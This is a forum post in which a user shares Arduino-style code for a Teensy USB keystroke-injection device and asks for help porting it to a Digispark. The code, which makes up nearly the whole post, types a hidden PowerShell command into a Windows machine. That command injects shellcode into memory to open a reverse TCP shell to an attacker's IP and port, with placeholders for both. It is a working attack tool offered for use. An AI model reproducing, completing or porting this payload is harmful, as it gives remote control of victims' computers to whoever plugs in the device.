Digistump Forums
The Digispark => Digispark Project Ideas => Topic started by: DullJellyfish on January 29, 2016, 10:33:00 am
-
Hi,
I have recently gotten a Digispark and found this code:
const unsigned int ledPin = 13; // My Teensy has the built-in LED on pin 13.
void setup()
{
pinMode(ledPin, OUTPUT);
digitalWrite(ledPin, HIGH);
delay(500);
digitalWrite(ledPin, LOW);
hurryUp(); // Fucking drivers.
spawnReverseTCP(); // This gets our shell.
}
void loop() // This is a one-off program. Looping is irrelevant.
{
}
void hurryUp() // Wait for the driver to finish installing.
{
boolean areWeThereYet = capsCheck(); // Check and see if we can turn on Caps Lock yet.
while (areWeThereYet == capsCheck()) // Spam the shit out of it if not.
{
returnCode(1, 500);
hitCaps();
}
hitCaps();
}
boolean capsCheck() // Check if Caps Lock is on.
{
if ((activeLEDs() & 2) == 2)
{
return true;
}
else
{
return false;
}
}
unsigned int activeLEDs() // Keyboard LED status.
{
return int(keyboard_leds);
}
void returnCode(unsigned int numBlinks, unsigned int halfDelay)
{
unsigned int count=0;
for(count = 0; count != numBlinks; count++)
{
digitalWrite(ledPin, HIGH);
delay(halfDelay);
digitalWrite(ledPin, LOW);
delay(halfDelay);
}
}
void hitCaps() // Press the Caps Lock button.
{
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
delay(100);
clearKeys();
}
void clearKeys() // Empty the keystroke buffer.
{
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void killCaps() // Turn off Caps Lock.
{
if (capsCheck())
{
hitCaps();
}
}
void spawnReverseTCP() // Start the real magic.
{
killCaps(); // Turn off Caps Lock if it's on.
returnCode(1, 100); // Keyboard is ready.
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // Open the Run dialog.
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
clearKeys();
delay(1000);
returnCode(1, 100); // Run is ready.
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=15 LINES=1"); // Start CMD small with dark text.
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
clearKeys();
delay(3000); // Give CMD some time to appear.
returnCode(1, 100); // CMD is ready.
// The next line sets the Powershell path based on our architecture.
Keyboard.println("if exist C:\\Windows\\SysWOW64 ( set PWRSHLXDD=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell) else ( set PWRSHLXDD=powershell )");
returnCode(1, 100); // Everything is ready.
/* * * * * * * * * * * *
* *
* Take the red pill. *
* *
* * * * * * * * * * * */
Keyboard.print("%PWRSHLXDD% -nop -w hidden -c \"$1 = '$c = ''");
Keyboard.print("[DllImport(\\\"kernel32.dll\\\")]public static ext");
Keyboard.print("ern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwS");
Keyboard.print("ize, uint flAllocationType, uint flProtect);[DllIm");
Keyboard.print("port(\\\"kernel32.dll\\\")]public static extern In");
Keyboard.print("tPtr CreateThread(IntPtr lpThreadAttributes, uint ");
Keyboard.print("dwStackSize, IntPtr lpStartAddress, IntPtr lpParam");
Keyboard.print("eter, uint dwCreationFlags, IntPtr lpThreadId);[Dl");
Keyboard.print("lImport(\\\"msvcrt.dll\\\")]public static extern I");
Keyboard.print("ntPtr memset(IntPtr dest, uint src, uint count);''");
Keyboard.print(";$w = Add-Type -memberDefinition $c -Name \\\"Win3");
Keyboard.print("2\\\" -namespace Win32Functions -passthru;[Byte[]]");
Keyboard.print(";[Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,");
Keyboard.print("0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,");
Keyboard.print("0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,");
Keyboard.print("0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,");
Keyboard.print("0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,");
Keyboard.print("0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,");
Keyboard.print("0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,");
Keyboard.print("0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,");
Keyboard.print("0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,");
Keyboard.print("0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,");
Keyboard.print("0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,");
Keyboard.print("0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,");
Keyboard.print("0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,");
Keyboard.print("0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,");
Keyboard.print("0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,");
Keyboard.print("0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,");
Keyboard.print("0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,");
Keyboard.print("0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,");
Keyboard.print("0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,");
Keyboard.print("0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,");
// Replace [0x@@,0x@@,0x@@,0x@@] with each part of your IP (in hex).
// Replace [0x@@,0x@@] with your open port (e.g. 65535 = 0xFF,0xFF)
// Don't forget to remove the [] brackets after editing.
Keyboard.print("[0x@@,0x@@,0x@@,0x@@],0x68,0x02,0x00,[0x@@,0x@@],0");
// MAKE SURE YOU DELETE THE BRACKETS.
// DO NOT PASS GO UNTIL YOU DELETE THE BRACKETS.
Keyboard.print("x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0");
Keyboard.print("x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0");
Keyboard.print("x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0");
Keyboard.print("x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0");
Keyboard.print("xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0");
Keyboard.print("x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0");
Keyboard.print("xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0");
Keyboard.print("xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0");
Keyboard.print("xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length -");
Keyboard.print("gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc");
Keyboard.print("(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length");
Keyboard.print("-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $");
Keyboard.print("sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;");
Keyboard.print("){Start-sleep 60};';$gq = [System.Convert]::ToBase");
Keyboard.print("64String([System.Text.Encoding]::Unicode.GetBytes(");
Keyboard.print("$1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRo");
Keyboard.print("ot + \\\"\\\\syswow64\\\\WindowsPowerShell\\\\v1.0");
Keyboard.print("\\\\powershell\\\";$cmd = \\\"-nop -noni -enc \\\"");
Keyboard.print(";iex \\\" $x86 $cmd $gq\\\"}else{$cmd = \\\"-nop -");
Keyboard.print("noni -enc\\\";iex \\\" powershell $cmd $gq\\\";}\"");
clearKeys();
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now(); // Send the command.
delay(100);
clearKeys();
returnCode(1, 1000); // All done.
}
I have tried to make it work on the Digispark, but without succes...
I tought maybe someone here could get it to work :)
Thanks in advance!
DJ